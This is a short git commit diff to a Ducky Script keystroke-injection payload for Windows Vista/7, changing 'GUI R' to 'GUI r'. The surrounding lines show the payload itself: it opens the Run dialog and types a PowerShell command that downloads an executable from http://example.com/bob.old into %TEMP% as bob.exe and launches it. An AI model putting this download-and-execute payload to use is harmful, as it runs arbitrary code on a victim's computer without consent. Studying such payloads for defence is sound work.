"GUI R" -> "GUI r"

This commit is contained in:
Tim Mattison 2014-07-22 16:35:07 -07:00
parent a15012e0a2
commit 960108e422
1 changed files with 1 additions and 1 deletions

View File

@ -42,7 +42,7 @@ REM Target: WINDOWS VISTA/7
REM Encoder V2.4
REM Using the run command for a broader OS base.
DELAY 3000
GUI R
GUI r
DELAY 1000
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%TEMP%\bob.exe'); Start-Process "%TEMP%\bob.exe"
DELAY 500